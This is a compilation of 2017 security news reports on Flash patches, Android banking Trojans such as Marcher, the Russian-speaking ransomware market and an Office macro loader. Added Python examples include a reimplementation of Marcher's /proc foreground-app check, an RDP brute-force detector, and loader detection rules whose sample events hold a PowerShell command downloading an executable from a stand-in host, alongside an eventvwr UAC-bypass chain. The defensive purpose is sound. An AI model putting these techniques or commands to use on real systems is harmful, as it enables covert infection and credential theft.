Flash Player 24.0.0.221 patches 13 critical vulnerabilities that can be exploited for arbitrary code execution, including type confusion, integer overflow, use-after-free, heap buffer overflow and other memory corruption issues.

The security holes were reported to Adobe by researchers at Google Project Zero, Microsoft, Palo Alto Networks, Fortinet’s FortiGuard Labs and CloverSec Labs.

In the Digital Editions ebook reader Adobe fixed nine flaws with the release of version 4.5.4 for Windows, Mac and Android. The patched vulnerabilities include a critical heap-based buffer overflow that can be exploited for arbitrary code execution and several important buffer overflows that could lead to a memory leak.

A majority of the flaws were reported to Adobe by Steven Seeley of Source Incite, but the critical issue was identified by Ke Liu of Tencent's Xuanwu LAB.

With the release of Adobe Campaign 6.11 for Windows and Linux, the vendor patched a moderate severity security bypass flaw affecting the client console. The weakness allows an authenticated attacker to upload and execute a malicious file, which could result in read/write access to the system.

A second flaw addressed in the latest version of Campaign is a moderate severity input validation bug that can be exploited for cross-site scripting (XSS) attacks. The vulnerabilities were reported to Adobe by researcher Léa Nuel.


Senators want more info on Trump’s personal phone and its defense
14.2.2017 securityaffairs Mobil

Two US senators want detailed info on Trump’s personal phone and the way the Defense Information Systems Agency (DISA) will protect it.
Security experts recently warned that Trump’s personal phone may be open to cyber attacks. The news of Trump’s use of an Android smartphone was first reported by The New York Times.
President Trump is still using his personal, insecure Android smartphone, and at the end of January the researcher known online as @WauchulaGhost reported that his Twitter account was exposed to the risk of hijacking because of security misconfigurations.

The official @POTUS Twitter account was linked to a private Gmail account owned by President Trump.

News of the day is that two senators have written to the U.S. Department of Defense requesting more info about the fact that President Donald Trump may still be using an unsecured Android phone.

“We write today regarding the security concerns stemming from President Donald Trump’s reported use of his personal, unofficial, smartphone. Public reports originally indicated that President Trump began using a “secure, encrypted device approved by the U.S. Secret Service” prior to taking office. Subsequent reports, however, suggest that President Trump may still be using his personal smartphone, an “old, unsecured Android phone.“” reads the letter sent by Tom Carper, a Democrat from Delaware, and Claire McCaskill, a Democrat from Missouri.

“While it is important for the President to have the ability to communicate electronically, it is equally important that he does so in a manner that is secure and that ensures the preservation of presidential records,”

Senators fear that nation-state actors could hack into the Trump’s personal phone and could access sensitive information.

“These reports are very troubling because security risks associated with the use of an unsecured phone include hackers’ ability to access the device to turn on audio recording and camera features, as well as engaging surveillance tools that allow location and other information tracking features” continues the letter.

Attackers could exploit security flaws in Trump’s personal phone to spy on his communications; for this reason, the national security agencies discourage the use of personal mobile devices for official business.

“DoD policies, operational constructs, and security vulnerabilities currently prevent the adoption of devices that are unapproved and procured outside of official government acquisition.” reads the Department of Defense’s 2013 Commercial Mobile Device Implementation Plan cited by the senators in the letter.

The senators request a written response on what kind of device President Trump is using for his communications, and they want more information about the Defense Information Systems Agency (DISA) initiative to protect presidential communications.

They want to know whether the DoD agency has written specific policies and procedures to mitigate the risks related to the use of Trump’s personal phone.


Dangerous malware is spreading via SMS in the Czech Republic

14.2.2017 SecurityWorld Viry
ESET analysts have caught the first cases of a new wave of attacks on banks in the Czech Republic and Slovakia through mobile banking. The attackers used Android malware localized for domestic users and spread it through ordinary SMS messages.

A new wave of malware spread by fraudulent SMS messages is targeting the Czech Republic. According to current information, the attackers have so far focused only on ČSOB. It can be expected, however, that the set of targeted banks will soon grow, says Lukáš Štefanko of ESET.

The malicious code, a Trojan for the Android platform, is a new variant of an already known malware family that spread at the end of January through fake SMS messages posing as communications from Česká pošta (the Czech Post) or the Alza.cz online store.

When the user opens Internet banking, the Android\Trojan.Spy.Banker.HV malware slips in a fake login page. An inattentive user thereby unknowingly sends their login credentials to the fraudsters and exposes themselves to the risk of having their account emptied.

In the current attack campaign, which is running in the Czech Republic and Slovakia, this dangerous malware is spread via SMS messages with a link to a supposed DHL application; the link actually downloads a fraudulent app named “Flash Player 10 Update” bearing the DHL icon.

Although the attackers changed the app’s name, they have not yet changed the icon, which looks suspicious during installation in a Czech or Slovak environment.


Experts warn of the rapid growth of the Marcher Android banking Trojan
14.2.2017 securityaffairs Android

Malware researchers at the security firm Securify have published a detailed analysis of the Marcher Android banking Trojan.
Security experts at Securify have published a detailed analysis of the Marcher Android banking Trojan, a threat that has been around since late 2013. The first variants of the malware were designed to trick users into handing over their payment card details using Google Play phishing pages. In March 2014, Marcher was observed targeting bank customers in Germany.

In the second half of 2016, the threat targeted dozens of organizations in various countries, including U.S., U.K., Australia, France, Poland, Turkey, and Spain.

The malicious code has been disguised as various popular apps, including WhatsApp and Netflix.

In early 2017, security experts at Zscaler spotted a strain of the Marcher Trojan masquerading as Super Mario Run, the mobile game that had recently been released for Apple’s iOS.

Super Mario Run is still not available for Android, and crooks are taking advantage of this to spread their malicious variant.

“In this new strain, the Marcher malware is disguised as the Super Mario Run app for Android. Knowing that Android users are eagerly awaiting this game, the malware will attempt to present a fake web page promoting its release.” states the analysis published by Zscaler.

Researchers at Securify have detected nine Marcher botnets over the last six months; the threat actors behind them use overlay injections to target a large number of different apps.

The vast majority of bots were located in Germany (51%), followed by France (20%), and UK (7%).

“Based on statistics of the backend we know that their campaign has successfully infected 5696 German and 2198 French mobile devices over total of 11049 affected mobile devices.” reads the analysis published by Securify. “While assessing their C2 server, we found that most infected devices are running Android 6.0.1. The C2 server at the time of investigation contained at least 1300 credit card numbers and other bank information (username/password + SMS tan). “

Marcher botnet

The Marcher malware is able to check foreground apps, when a targeted app is executed the malicious code uses an overlay screen to trick victims into handing over sensitive information, such as login credentials and credit card data.

“Marcher is one of the few Android banking Trojans to use the AndroidProcesses library, which enables the application to obtain the name of the Android package that is currently running in the foreground. This library is used because it uses the only (publicly known) way to retrieve this information on Android 6 (using the process OOM score read from the /proc directory),” Securify researchers explained.
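The foreground check quoted above is what decides when the overlay is shown, so it is worth seeing what “read the OOM score from /proc” amounts to in practice. The following Python is an added illustration written for this article, not Marcher’s or the AndroidProcesses library’s code: it picks the process owned by a third-party app uid (Android assigns apps uids from 10000 upwards) with the lowest non-negative oom_score_adj, which is the convention Android uses to mark the focused app (0) versus visible (low positive), cached (high positive) and system/persistent (negative) processes. The process table and the target package names are constructed; on Android 6 the /proc files involved were world-readable, which is why no permission was needed, and Android 7 closed this channel by mounting /proc with hidepid.

```python
"""Foreground-app detection from /proc in the style Securify attributes to Marcher.
Added example, not the malware's or the AndroidProcesses library's code."""
import os

# Constructed process table: (cmdline/package, uid, oom_score_adj).
SAMPLE_PROCS = [
    ("system_server", 1000, -900),          # system, never an app
    ("com.android.systemui", 10020, -800),  # persistent app process
    ("com.whatsapp", 10077, 700),           # cached in the background
    ("com.example.bank", 10123, 0),         # focused app (hypothetical package name)
    ("com.android.chrome", 10090, 200),     # visible but not focused
]

APP_UID_MIN, APP_UID_MAX = 10000, 19999     # Android third-party app uid range
TARGET_PACKAGES = {"com.example.bank", "com.whatsapp"}  # hypothetical overlay targets


def pick_foreground(procs):
    """Return the package name of the most likely foreground app: the process with an
    app uid and the lowest non-negative oom_score_adj. None if no app qualifies."""
    best = None
    for name, uid, adj in procs:
        if not name or not (APP_UID_MIN <= uid <= APP_UID_MAX) or adj < 0:
            continue
        if best is None or adj < best[1]:
            best = (name, adj)
    return best[0] if best else None


def is_target_foreground(procs, targets=TARGET_PACKAGES):
    """(True, package) when a targeted app is in front, else (False, package)."""
    fg = pick_foreground(procs)
    return fg in targets, fg


def read_proc_table(proc_root="/proc"):
    """Collect (cmdline, uid, oom_score_adj) for every pid under proc_root.
    On desktop Linux the adj values do not encode app state, so only the
    parsing is meaningful there; returns [] when /proc is unavailable."""
    table = []
    try:
        entries = os.listdir(proc_root)
    except OSError:
        return table
    for entry in entries:
        if not entry.isdigit():
            continue
        try:
            with open(f"{proc_root}/{entry}/cmdline", "rb") as f:
                name = f.read().split(b"\0", 1)[0].decode(errors="replace")
            with open(f"{proc_root}/{entry}/status") as f:
                uid = next(int(line.split()[1]) for line in f if line.startswith("Uid:"))
            with open(f"{proc_root}/{entry}/oom_score_adj") as f:
                adj = int(f.read().strip())
        except (OSError, ValueError, StopIteration):
            continue  # process exited or file unreadable
        table.append((name, uid, adj))
    return table


if __name__ == "__main__":
    print(is_target_foreground(SAMPLE_PROCS))
```

For a defender the useful lesson is the inverse: any app that walks /proc and reads other processes’ oom_score_adj or cmdline is doing something a banking-overlay Trojan needs and an ordinary app does not, which makes that file access pattern a reasonable thing to alert on in a dynamic-analysis sandbox.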

The malware also implements a simple but effective antivirus evasion technique: it maintains a list of popular antivirus apps whose removal attempts it blocks. Marcher monitors for any AV app in the list and, if one is running, forces the device back to the home screen. Even if the AV program detects Marcher, it still waits for the user’s permission before removing it, and because the user never gets the chance to grant that permission, the malware is not deleted.

The “solid organization” behind the Marcher Trojan makes the threat very dangerous; the experts consider it as effective as notorious banking malware such as Sinowal/Torpig, Dyre, Dridex, and Gozi.

“Based on the statistics we found on this one C2 panel we researched and the amount of different C2 panels out there, we believe that the potential financial losses due to Android banking Trojans are, or will soon be, bigger than the current losses from desktop malware like Gozi and Dridex, especially since hardly any of the banking apps seem to detect the attack,” concluded the experts.


A look into the Russian-speaking ransomware ecosystem
14.2.2017 Kaspersky Virus

It is no secret that encryption ransomware is one of the key malware problems today, for both consumers and corporate users. While analyzing the attack statistics for 2016, we discovered that by the end of the year a regular user was attacked with encryption ransomware on average every 10 seconds, with an organization somewhere in the world hit around every 40 seconds.


Kaspersky Lab statistics on the ransomware threat in 2016

In total we’ve registered attacks using encryption ransomware against 1,445,434 users worldwide. Between them, these people were attacked by 54 thousand modifications of 60+ families of crypto ransomware.

So why is this happening now if encryption ransomware, as a type of malware, has existed since the mid-2000s? There are three main reasons:

It’s easy to buy a ransomware build or builder on the underground market
It’s easy to buy a distribution service
Crypto ransomware, as a business, has a very clear monetization model through cryptocurrencies
In other words, this is a fine tuned, user friendly and constantly developing ecosystem. In the last few years we, at Kaspersky Lab, have been monitoring the development of this ecosystem. This is what we’ve learned.

1. In most cases crypto ransomware has a Russian origin

One of the findings of our research is that 47 of the 60+ crypto ransomware families we’ve discovered in the last 12 months are related to Russian-speaking groups or individuals. This conclusion is based on our observation of underground forums, command and control infrastructure, and other artefacts which can be found on the web. It is hard to draw strong conclusions on why so many of the ransomware families out there have a Russian origin, but it is safe to say that this is because there are a lot of well-educated and skilled code writers in Russia and its neighboring countries.

Another possible reason is that the Russian cybercriminal underground has the richest background when it comes to ransomware schemes. Prior to the current crypto ransomware wave, there was another ransomware-themed malware epidemic. Between approximately 2009 and 2011, thousands of users in Russia and its neighboring countries experienced attacks which used so-called Windows- or browser-lockers. This type of ransomware blocks the user’s access to their browser or OS and then demands a ransom in exchange for unlocking access. The epidemic withered for a number of reasons: law enforcement agencies responded adequately and caught several criminals involved in the business; mobile operators made the process of withdrawing money through premium SMS services harder; and the security industry invested a lot of resources into developing free unlocking services and technologies.

But it seems that experienced ransomware criminals haven’t disappeared, they’ve just been waiting for a new monetization model, which has now emerged in the form of crypto currencies. This time though, the ransomware problem is not specifically Russian, but global.

2. There are three types of involvement in the ransomware “business”

The Russian underground crypto ransomware market currently offers criminals three different ways of entering the illegal business.

Create new ransomware for sale
Become a partner in a ransomware affiliate program
Become the owner of an affiliate program
The first type of involvement requires advanced code writing skills, including a deep knowledge of cryptography. The actors which we have observed in this category are like gun traders: they usually don’t participate in actual attacks, but only sell code.


An example of an advertisement selling unique crypto malware, posted by its creator. The author promises encryption with Blowfish and RSA-2048 algorithms, anti-emulation techniques, advanced scanning capabilities, and functions allowing for the removal of backups and shadow copies of the information stored on the victim’s PC.

Sometimes, authors of the malware sell their “products” with all the source code for a fixed price (usually several thousand dollars) and sometimes they sell their builder – the tool which allows criminals with no programming background to build the crypto ransomware with a specific list of functions.

The following illustration provides hints as to what capabilities a builder gives to a criminal. For example, it allows criminals to create ransomware which will start encrypting files only after 10 minutes of user inactivity; which will change the extensions of encrypted files to one of the criminals’ choice; and which will request administrator privileges until it receives it. It also allows criminals to change desktop wallpapers to arbitrary ones, and to implement some other features that in the end can be combined into a very dangerous piece of software.


The interface of the Glove ransomware builder

Builders are usually much cheaper than the full source code of unique ransomware – hundreds of dollars. However, authors (and owners) of software like this often charge customers for each new build of malware created with help of their software.

Pay-per-build is another type of monetization used by the authors of the original ransomware. In this case the price drops even lower, to tens of dollars, but the client would receive the malware with a fixed list of functions.


An advertisement offering unique crypto ransomware with a pay-per-build model

The build often includes not only the malware code itself, but also tools for statistics and interaction with infected PCs.


An example of a command and control panel which comes with the build of a certain ransomware family

Affiliate programs, the third type of involvement in the ransomware criminal business, are a rather standard form of cybercrime: owners of the program provide partners with all the necessary infection tools, and then the partners work on distributing the malware. The more successful their efforts, the more money they receive. Participation in such programs requires nothing but the will to conduct certain illegal activities and a couple of bitcoins as a partnership fee.


An advertisement for an affiliate program

Interestingly, while researching the development of the underground ransomware ecosystem, we discovered two types of affiliate programs: one for all, and one for specific partners.

Unlike the programs for everyone, “elite” programs won’t accept just any kind of partner. In order to become a partner in an elite program, a candidate has to provide a personal recommendation from one of the acting partners in the program. Besides that, the candidate must prove that they have certain malware distribution capabilities. In one case we observed in the last year, the candidate had to demonstrate their ability to complete at least 4000 successful downloads and installations of the malware on victim PCs. In exchange, the partner gets some free tools for the obfuscation of ransomware builds (in order to make them less visible to security solutions) and a good conversion rate – up to 3%, which is a very good deal, at least compared to rates that legal affiliate programs offer.

To summarize all that is written above: flexibility is the key feature of the current underground ransomware ecosystem. It offers lots of opportunities to people with a propensity towards criminal behavior, and it almost doesn’t matter what level of IT experience they have.

3. There are some really big players on this market

If you think that being the owner or a partner of an “elite” affiliate program is the highest possible career milestone in the world of ransomware, you are mistaken. In reality, ransomware creators, their stand-alone clients, partners and owners of affiliate programs are often working for a bigger criminal enterprise.


The structure of a professional ransomware group contains the malware writer (aka the creator of the group), affiliate program owners, partners of the program, and the manager who connects them all into one invisible enterprise

There are currently several relatively large ransomware groups with Russian-speaking participants out there. In the last few months we’ve been researching the operation of one such group and now have an understanding of how it operates. We consider this group an interesting one, because it is built in a way that made it really hard for us to identify all its affiliates. It consists of the following parties: The creator, the manager, the partners, and affiliate programs. According to our intelligence the creator and the leader of this group is the ransomware author. He developed the original ransomware, additional modules for it and the IT infrastructure to support the malware operation. The main task of the manager is to search for new partners and support existing ones. According to our knowledge, the manager is the only person who interacts with the creator. The primary task of partners is to pick up the new version of ransomware and distribute it successfully. This means successfully infecting as many PCs as possible and demanding a ransom. For this – among other tools – partners utilize the affiliate programs which they own. The creator earns money by selling exclusive malware and updates to the partners, and all the other participants of the scheme share the income from the victims in different proportions. According to our intelligence, there are at least 30 partners in this group.

4. Costs and profits on the underground ransomware market are high

We estimate that the revenue of a group like the one described above could reach as much as thousands of dollars a day in successfully demanded ransom payments. Although, of course, as with any other type of malicious activity at a professional level, the professional ransomware player spends a lot on resources in order to create, distribute and monetize the malicious code.

The structure of the operating cost of a large ransomware group more or less looks like the following:

Ransomware modules update
New features
Bypass techniques
Encryption improvement
Distribution (spam/exploit kits)
AV check service
Credentials for hacked servers
Salary for hired professionals (usually these are IT administrators who support the server infrastructure)
The core of the whole group’s mechanics is ransomware code and the distribution channels.

They distribute ransomware in five main ways: exploit kits, spam campaigns, social engineering, hacked dedicated servers, and targeted hacks. Exploit kits are one of the most expensive types of distribution tool and can cost several thousand dollars per week, but, on the other hand, this type of distribution is one of the most effective in terms of the percentage of successful installations.

Spam emailing is the second most popular form of distribution. Spear phishing emails sent by criminals are usually disguised as an important message from a government organization or large bank, with a malicious attachment. According to what we’ve observed in the last year, spamming targets with malicious emails is a more than workable method, because in 2016 the amount of ransomware-related malicious spam blocked by our systems was enormous.

And sometimes the emails that the targets of ransomware hackers receive are technically legit. While working on incident response we’ve observed several instances where an email with a malicious attachment (which in the end encrypted important victim data) was sent out from a legitimate email, by a legitimate user. Very often, these are emails from clients or partners of an attacked organization, and after digging deeper and talking to representatives of the organization which sent the malicious emails, we learned that that organization was infected as well.


How criminals use one infected organization to attack another

It appeared to us that the ransomware criminals initially infected one organization, then got access to its email system and started sending out emails with a malicious attachment to the whole company’s contact list. It is hard to overestimate the danger of this form of ransomware distribution: even if the recipient of an email like this is aware of the main methods cybercriminals use to distribute malware, there is no way for him or her to identify the attack.

As we’ve learned, the operating costs that ransomware criminals face to support their campaigns may amount to tens of thousands of dollars in some cases. Even so, this business is unfortunately extremely profitable. Based on what we’ve seen in conversations on underground forums, criminals are lining their pockets with nearly 60% of the revenue received as a result of their activities. So, let’s go back to our estimate of the daily revenue of a group, which may be tens of thousands of dollars on a good day.


The typical distribution of profit (green) vs. operating costs (red) in a ransomware business

That’s of course an estimate of cumulative net income: the total sum of money which is used as payoffs to all the participants of the malicious scheme – starting from regular affiliate program members and ending with the elite partners, manager and the creator. Still, this is a huge amount of money. According to our observations, an elite partner generally earns 40-50 bitcoins per month. In one case we’ve seen clues that an especially lucky partner earned around 85 bitcoins in one month, which, according to the current bitcoin exchange rate, equals $85,000 dollars.

5. Professional ransomware groups are shifting to targeted attacks

An extremely worrying trend which we are observing right now is that ransomware groups with large budgets are shifting from attacking regular users and, occasionally, small companies, towards targeted attacks against relatively large organizations. In one of our incident response cases we have seen a targeted attack against a company with more than 200 workstations, and in another case one had more than 1000.

The mechanics of these new attacks are very different to what we’ve been used to seeing.

For initial infection they have not used exploit packs or spear-phishing spam. Instead, if they were able to find a server belonging to the targeted company, they tried to hack it
To get into the organization’s network, this group used open source exploits and tools
If the organization had an unprotected server with RDP access, this group tried to brute-force it
To get the access rights needed to install ransomware across the network with psexec, they used Mimikatz
Then they could establish persistence using an open-source RAT called Pupy
Once they had gained a foothold in the attacked network, they studied it, chose the most important files and encrypted them with a custom, previously unseen build of ransomware
Another group which we found in another large organization did not use any ransomware at all. They encrypted data manually: they chose important files on a server and moved them into a password-protected archive.
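The RDP brute-force step in the chain above is the one an organization can see in its ordinary Windows Security logs, before Mimikatz and psexec come into play. The following Python is an added example, not from Kaspersky’s report: it flags any source address that accumulates a run of failed RemoteInteractive logons (event 4625, logon type 10) inside a short sliding window, and records whether a successful RDP logon (4624) from the same source followed, which is the signature of guessing that worked. The log lines are constructed and simplified to five whitespace-separated fields; in a real deployment they would come from a SIEM export or Get-WinEvent, and the window and threshold would be tuned to the environment.

```python
"""Detect RDP password guessing in (simplified) Windows Security log events.
Added example for this article; the sample events below are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample, one event per line:
# "<ISO timestamp> <EventID> <LogonType> <TargetUserName> <IpAddress>"
# 4625 = failed logon, 4624 = successful logon; logon type 10 = RemoteInteractive (RDP).
SAMPLE_LOG = """\
2017-02-10T02:00:01 4625 10 administrator 203.0.113.7
2017-02-10T02:00:03 4625 10 administrator 203.0.113.7
2017-02-10T02:00:05 4625 10 admin 203.0.113.7
2017-02-10T02:00:08 4625 10 backup 203.0.113.7
2017-02-10T02:00:11 4625 10 administrator 203.0.113.7
2017-02-10T02:00:14 4625 10 administrator 203.0.113.7
2017-02-10T02:01:30 4624 10 administrator 203.0.113.7
2017-02-10T08:15:00 4624 2 alice 10.0.0.5
2017-02-10T08:16:12 4625 3 bob 10.0.0.9
2017-02-10T09:00:00 4625 10 carol 10.0.0.21
""".splitlines()

RDP_LOGON_TYPE = "10"  # caveat: with NLA enabled, failed RDP attempts can also be logged as type 3


def parse_event(line):
    """Split one constructed log line into its fields."""
    ts, event_id, logon_type, account, src = line.split()
    return {"ts": datetime.fromisoformat(ts), "id": event_id,
            "type": logon_type, "account": account, "src": src}


def detect_rdp_bruteforce(lines, threshold=5, window=timedelta(minutes=10)):
    """Map each source IP with >= threshold failed RDP logons inside a sliding
    window to a summary: total failures, accounts tried, first timestamp of the
    burst, and whether an RDP success from the same source came afterwards."""
    events = sorted((parse_event(l) for l in lines if l.strip()), key=lambda e: e["ts"])
    recent = defaultdict(list)   # src -> failures still inside the window
    total = defaultdict(int)     # src -> all RDP failures seen from that source
    findings = {}
    for e in events:
        if e["type"] != RDP_LOGON_TYPE:
            continue
        if e["id"] == "4625":
            total[e["src"]] += 1
            bucket = recent[e["src"]]
            bucket.append(e)
            while bucket and e["ts"] - bucket[0]["ts"] > window:
                bucket.pop(0)          # expire failures older than the window
            if len(bucket) >= threshold:
                f = findings.setdefault(e["src"], {
                    "accounts": set(), "first_seen": bucket[0]["ts"],
                    "success_after": False, "success_account": None})
                f["accounts"].update(x["account"] for x in bucket)
                f["failures"] = total[e["src"]]
        elif e["id"] == "4624" and e["src"] in findings:
            f = findings[e["src"]]     # success from an already-flagged source
            f["success_after"] = True
            f["success_account"] = e["account"]
    return findings


if __name__ == "__main__":
    for src, f in detect_rdp_bruteforce(SAMPLE_LOG).items():
        print(src, f["failures"], sorted(f["accounts"]), f["success_after"], f["success_account"])
```

A source that is flagged and then succeeds is the case to escalate immediately: at that point the attacker is one Mimikatz run away from the domain credentials the rest of the chain needs, and the host should be isolated rather than merely blocked at the firewall.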

Conclusion

In both cases described above the actors demonstrated a modus operandi that is characteristic of targeted attack actors – while we’re almost 100% sure that the groups behind these attacks are the ones that previously worked mostly on widespread ransomware campaigns. There are two main reasons why we think ransomware actors are starting to implement targeted methods in their operations.

1. Thanks to multiple successful massive campaigns they’re now funded well enough to invest big money in sophisticated operations.

2. A ransomware attack against a large corporation makes total sense, because it is possible to paralyze the work of a whole company, resulting in huge losses. Due to this, it is possible to demand a ransom larger than the one requested from home users and small companies.

We have already seen a mutation of this kind with another dangerous type of malicious activity: the financial cyberattack. These also started as massive attacks against the users of online banking. But as time passed, the actors behind these campaigns shifted their interests, firstly to small and medium companies, and then to large corporations, the banks themselves.

It is also important to note that so far the ransomware business has been considered a safe one by criminals. This is due to their certainty that the use of crypto currencies allows them to avoid being tracked by the “follow the money” principle, as well as the lack of arrests of gangs involved in ransomware. From our perspective all these conclusions are wrong. We hope that law enforcement agencies will soon start paying more attention to these groups.

Sun Tzu said: If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained, you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.

This article has two main purposes: to educate people interested in fighting ransomware and to raise awareness of the problem which targeted attacks with the use of ransomware can bring.

Although well-publicized prosecution cases against ransomware actors are yet to take place, people and companies can act now to make the job of ransomware actors harder and protect their data. First of all, make regular backups and store them on a drive that is air-gapped from your organization’s main network.

Don’t forget to protect your servers with proven security solutions. They identify and block the most recent versions of ransomware strains.

And the main advice: DO NOT PAY! If you pay the ransom, your money will be pumped into the malicious ecosystem, which is already flooded with funds. The more money criminals get, the more sophisticated tools they gain access to, giving them much broader attack opportunities.


ThreatConnect Launches New Threat Intelligence Products

14.2.2017 securityweek Security

Threat intelligence firm ThreatConnect announced this week the launch of a new suite of products designed to help organizations understand adversaries, automate their security operations, and accelerate threat mitigation.

The new products, built on the ThreatConnect Platform, have been named TC Complete, TC Analyze, TC Manage and TC Identify.

TC Complete, the company’s flagship product, is a security operations and analytics platform that aims to enable companies to efficiently run their security operation center (SOC) by giving them the ability to orchestrate security processes, analyze data, respond to threats, and report progress from a single location. TC Complete incorporates the features and benefits of all the other ThreatConnect products.

Another new product is TC Identify, which provides vetted threat intelligence collected from over 100 open source feeds, ThreatConnect communities, the company’s research team and, optionally, intelligence from members of the TC Exchange program.

TC Manage is an intelligence-driven orchestration tool that enables organizations to automate threat data management processes, including notifying team members when manual tasks need to be performed, or sending indicators to defensive tools for blocking or alerting.

The last new product is the TC Analyze threat intelligence platform, which provides a central location for analyzing data and integrating with existing security tools. The platform allows analysts to better understand which threats are relevant, gain visibility into attack patterns, and share threat intelligence with executives and other stakeholders.


“By introducing our new innovative suite of products, we are able to address all levels of need in the marketplace. With these four specific products, ThreatConnect allows any organization with any size security team the option to extend its capabilities,” said ThreatConnect VP of Product Andy Pendergast. “We conducted substantial research into organizations’ current and potential intelligence needs to protect their environment and came up with these specific products to reach them where they are now and where they need to be in the future.”


Office Loader leverages malicious macros to deliver multiple malware
14.2.2017 securityaffairs Virus

Security researchers at Palo Alto Networks spotted a campaign leveraging a Microsoft Office loader that uses malicious macros to drop multiple malware families.
The researchers analyzed more than 650 unique samples of this specific loader since early December 2016, accounting for 12,000 phishing emails targeting numerous industries.

Most affected industries are High Tech, Professional and Legal Services, and Government.


The Office loader is being delivered via spam messages and employs heavily obfuscated malicious macros and a user account control (UAC) bypass technique to infect the target.

“The loader itself is primarily delivered via email and makes use of heavily obfuscated malicious macros as well as a user account control (UAC) bypass technique that was originally discovered in August 2016.” reads the analysis published by Palo Alto Networks.

The phishing messages carried malicious documents masquerading as invoices, product lists, deposit slips, document scans, and more.

The Office loader was used to drop several malware families, including LuminosityLink, KeyBase, PredatorPain, Ancalog, Bartalex, Pony, and DarkComet.

“Based on the large amount of commodity malware families being dropped, as well as the wide distribution seen, this loader appears to primarily be used for widespread campaigns.” continues the analysis.

According to the experts, the threat actor behind the campaign may have used a builder to generate the malicious macros, which have been obfuscated with a large amount of garbage code and randomly chosen variable names. The second part of the malicious macro also includes obfuscated strings and a number of strings written to the Word document.

The first half of the macro includes a function to decode the obfuscated strings.

“In the second half of the macro, we see garbage code, a number of obfuscated strings, as well as a number of strings that are written to the Word document. These strings are in-line with the ploy being used by the attacker based on the witnessed subject line and filename.” reads the analysis.

“This function will download a file via PowerShell and drop it within the %TEMP% directory. It then sets a specific registry key to point to this newly dropped file. Finally, it will execute the built-in eventvwr.exe process, sleep for roughly 15 seconds by performing a ping against the localhost 15 times, and removes the dropped file. The registry key write and execution of eventvwr.exe is a UAC bypass technique that was first discussed here.”

The experts noticed that a small number of samples used the built-in BITSAdmin tool instead of PowerShell to download the malware.

“Overall, this new loader is interesting in its use of performing a UAC bypass. Additionally, the widespread use of this loader since December of last year shows that it is being used in numerous campaigns.” concluded PaloAlto Networks. “It is unclear if this loader is being used by one or more groups. Multiple industries have been targeted by this loader, which has been used to deploy multiple malware families.”
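The execution chain described above (Office process spawning a PowerShell or BITSAdmin downloader, a registry write pointing at the dropped file, eventvwr.exe launched and in turn launching something other than its normal child, and a ping loop used as a sleep) is exactly what host telemetry can be matched against. The following Python is an added example, not code from Palo Alto Networks or from the loader itself. It runs over constructed, Sysmon-style event records rather than real logs, and the registry path it checks (the mscfile shell\open\command handler under the user's hive, which the publicly documented eventvwr.exe bypass from August 2016 hijacks) is an assumption taken from that write-up, since this page only says "a specific registry key".

```python
import re

# Constructed, Sysmon-style sample events (not real telemetry).
# id 1 = process creation, id 13 = registry value set.
SAMPLE_EVENTS = [
    {"id": 1, "host": "ws01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n invoice_scan.doc"},
    {"id": 1, "host": "ws01",
     "parent": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden (New-Object Net.WebClient).DownloadFile("
                "'http://example.invalid/inv.exe','C:\\Users\\u\\AppData\\Local\\Temp\\inv.exe')"},
    {"id": 13, "host": "ws01",
     "image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "target": r"HKU\S-1-5-21-1-1-1-1001\Software\Classes\mscfile\shell\open\command\(Default)",
     "details": r"C:\Users\u\AppData\Local\Temp\inv.exe"},
    {"id": 1, "host": "ws01",
     "parent": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\eventvwr.exe", "cmdline": "eventvwr.exe"},
    {"id": 1, "host": "ws01", "parent": r"C:\Windows\System32\eventvwr.exe",
     "image": r"C:\Users\u\AppData\Local\Temp\inv.exe", "cmdline": "inv.exe"},
    {"id": 1, "host": "ws01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\PING.EXE", "cmdline": "ping -n 15 127.0.0.1"},
    # Benign control: an administrator opening Event Viewer, which normally spawns mmc.exe.
    {"id": 1, "host": "ws02", "parent": r"C:\Windows\System32\eventvwr.exe",
     "image": r"C:\Windows\System32\mmc.exe", "cmdline": "mmc.exe eventvwr.msc"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
DOWNLOADERS = {"powershell.exe", "bitsadmin.exe"}
# Handler key hijacked by the eventvwr.exe UAC bypass (assumption from the public
# August 2016 write-up; the page itself only says "a specific registry key").
MSCFILE_HANDLER = re.compile(r"\\software\\classes\\mscfile\\shell\\open\\command", re.I)
PING_SLEEP = re.compile(r"\bping\b.*-n\s+(\d+)\s+(127\.0\.0\.1|localhost)", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Return the rule names one event triggers (possibly none)."""
    hits = []
    if ev["id"] == 1:
        img, par = basename(ev["image"]), basename(ev["parent"])
        cmd = ev.get("cmdline", "")
        # Office application launching a downloader with download-style arguments.
        if par in OFFICE_APPS and img in DOWNLOADERS and re.search(r"download|/transfer", cmd, re.I):
            hits.append("office_spawns_downloader")
        # Event Viewer normally spawns mmc.exe; anything else is the hijacked handler.
        if par == "eventvwr.exe" and img != "mmc.exe":
            hits.append("eventvwr_uac_bypass_exec")
        # ping -n <count> localhost used as a sleep (the loader uses 15).
        m = PING_SLEEP.search(cmd)
        if img == "ping.exe" and m and int(m.group(1)) >= 10:
            hits.append("ping_localhost_sleep")
    elif ev["id"] == 13 and MSCFILE_HANDLER.search(ev.get("target", "")):
        hits.append("mscfile_handler_hijack")
    return hits


def scan(events):
    """Group triggered rules per host: {host: sorted rule names}."""
    findings = {}
    for ev in events:
        for rule in check_event(ev):
            findings.setdefault(ev["host"], set()).add(rule)
    return {host: sorted(rules) for host, rules in findings.items()}


if __name__ == "__main__":
    for host, rules in scan(SAMPLE_EVENTS).items():
        print(host, rules)
```

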